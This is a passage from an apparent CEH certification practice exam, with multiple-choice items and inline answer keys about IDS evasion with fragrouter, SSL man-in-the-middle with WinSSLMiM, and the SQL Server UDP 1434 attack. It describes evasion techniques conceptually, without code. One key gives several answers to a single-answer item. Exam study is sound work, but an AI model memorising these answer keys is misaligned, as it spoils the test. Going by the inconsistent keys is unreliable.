originator of the attack. ^ What worm was used for this attack? (Select the Best Answer)^A. Mellisa^B. Pretty Park^C. Goga^D. W32:Klez B#CEH Q.66 Which of the following correctly describes the IDS evasion tool fragrouter? (Select the Best Answer)^A. Some IDS can only keep track of one host/port connection at a time. Flood the target port with non-existent SYN packet first so that these IDS ignore the real connection.^B. IP Fragmentation. By sending out fragment packets out of order, some IDS assume the fragment packets arrive in order. They just reassemble the data as soon as the marked final fragment arrives. Sending out fragment packets out of order may fool the IDS.^C. Sending overlapping fragment packets. There may be a gap between the IDS and end-point server handling overlapping fragment. If the IDS does not handle overlapping fragments in a manner consistent with the systems it watches, it may reassemble a completely different packet than an end system in receipt of the same fragments.^D. An end-system can accept a packet that an IDS rejects. An IDS that mistakenly rejects such a packet misses its contents entirely. B#CEH Q.67 What does the hacking tool WinSSLMiM used for? (Select the Best Answer)^A. Kills SSL TCP Sessions.^B. Used in Man-in-the-Middle attacks against SSL Connections.^C. Generates fake SSL Certificates.^D. Monitors Windows SSL Sessions. A,B,C#CEH Q.68 The Microsoft SQL Server contains several serious vulnerabilities that allow remote attackers to obtain sensitive information, alter database content, compromise SQL servers, and, in some configurations, compromise server hosts. ^ The SQL Server Resolution Service operates on UDP port 1434, provides a way for clients to query the appropriate network endpoints to use for a particular SQL Server instance. By sending a carefully crafted packet to the Resolution Service, an attacker could compromise and take over the system. ^ The hacking tool SQL2.EXE is used to launch this attack.^ C:\